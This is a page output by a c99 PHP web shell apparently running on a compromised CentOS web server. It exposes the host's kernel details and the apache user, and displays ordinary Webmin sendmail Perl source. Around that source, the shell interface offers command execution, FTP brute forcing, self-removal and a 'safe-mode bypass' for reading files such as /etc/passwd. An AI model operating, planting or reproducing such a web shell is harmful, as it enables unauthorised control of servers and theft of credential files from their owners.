!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/sendmail/   drwxr-xr-x
Free 53.79 GB of 127.8 GB (42.09%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     save_feature.cgi (2.32 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# save_feature.cgi
# Add a new line to the M4 file

require './sendmail-lib.pl';
require './features-lib.pl';
&ReadParse();
$features_access || &error($text{'features_ecannot'});
&error_setup($text{'feature_err'});

@features = &list_features();
if ($in{'new'}) {
    $feature = { 'type' => $in{'type'} };
    }
else {
    $feature = $features[$in{'idx'}];
    }

&lock_file($config{'sendmail_mc'});
if ($in{'delete'}) {
    # Just delete this entry
    &delete_feature($feature);
    }
else {
    # Validate and store inputs
    if ($feature->{'type'} == 0) {
        $feature->{'text'} = $in{'text'};
        }
    elsif ($feature->{'type'} == 1) {
        #local ($same) = grep { $_->{'type'} == 1 &&
        #               $_->{'name'} eq $in{'name'} } @features;
        #$same && ($in{'new'} || $feature->{'name'} ne $in{'name'}) &&
        #    &error(&text('feature_efeat', "<tt>$in{'name'}</tt>"));
        $feature->{'name'} = $in{'name'};
        local @v;
        for($i=0; defined($in{"value_$i"}); $i++) {
            push(@v, $in{"value_$i"});
            }
        while($v[$#v] eq '' && @v) { pop(@v); }
        $feature->{'values'} = \@v;
        }
    elsif ($feature->{'type'} == 2 || $feature->{'type'} == 3) {
        local ($same) = grep { ($_->{'type'} == 2 || $_->{'type'} == 3) &&
                       $_->{'name'} eq $in{'name'} } @features;
        $same && ($in{'new'} || $feature->{'name'} ne $in{'name'}) &&
            &error(&text('feature_edef', "<tt>$in{'name'}</tt>"));
        $feature->{'name'} = $in{'name'};
        if ($in{'undef'}) {
            $feature->{'type'} = 3;
            }
        else {
            $feature->{'type'} = 2;
            $feature->{'value'} = $in{'value'};
            }
        }
    elsif ($feature->{'type'} == 4) {
        local ($same) = grep { $_->{'type'} == 4 &&
                       $_->{'mailer'} eq $in{'mailer'} } @features;
        $same && ($in{'new'} || $feature->{'mailer'} ne $in{'mailer'}) &&
            &error(&text('feature_emailer', "<tt>$in{'mailer'}</tt>"));
        $feature->{'mailer'} = $in{'mailer'};
        }
    elsif ($feature->{'type'} == 5) {
        local ($same) = grep { $_->{'type'} == 5 } @features;
        $same && $in{'new'} &&
            &error(&text('feature_eostype', "<tt>$in{'ostype'}</tt>"));
        $feature->{'ostype'} = $in{'ostype'};
        }

    # Save or create the entry
    if ($in{'new'}) {
        &create_feature($feature);
        }
    else {
        &modify_feature($feature);
        }
    }

&unlock_file($config{'sendmail_mc'});
&webmin_log($in{'new'} ? 'create' : $in{'delete'} ? 'delete' : 'modify',
        "feature", undef, $feature);
&redirect("list_features.cgi");


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0137 ]--